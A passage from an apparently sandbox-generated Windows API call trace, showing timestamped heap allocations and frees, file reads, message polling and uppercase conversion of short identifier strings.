dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0255.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0255.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0255.163] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0255.163] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x7712, lpOverlapped=0x0) returned 1 [0255.165] ReadFile (in: hFile=0x1f8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0255.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7712) returned 0x24c7a50 [0255.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0255.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0255.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0255.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0255.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0255.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7712) returned 0x24cf170 [0255.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0255.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.170] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7712) returned 0x24c7a50 [0255.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0255.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.171] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0255.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0255.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0255.172] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.172] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0255.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0255.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0255.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7712) returned 0x24c7a50 [0255.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1898 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0255.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0255.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0255.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0255.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7712) returned 0x24d6890 [0255.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0255.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0255.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0255.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0255.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0255.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0255.177] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.177] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0255.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0255.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.179] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0255.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.181] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0255.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0255.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0255.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.182] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0255.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0255.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0255.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.183] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.183] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.184] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.184] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.184] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.184] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.185] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.185] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 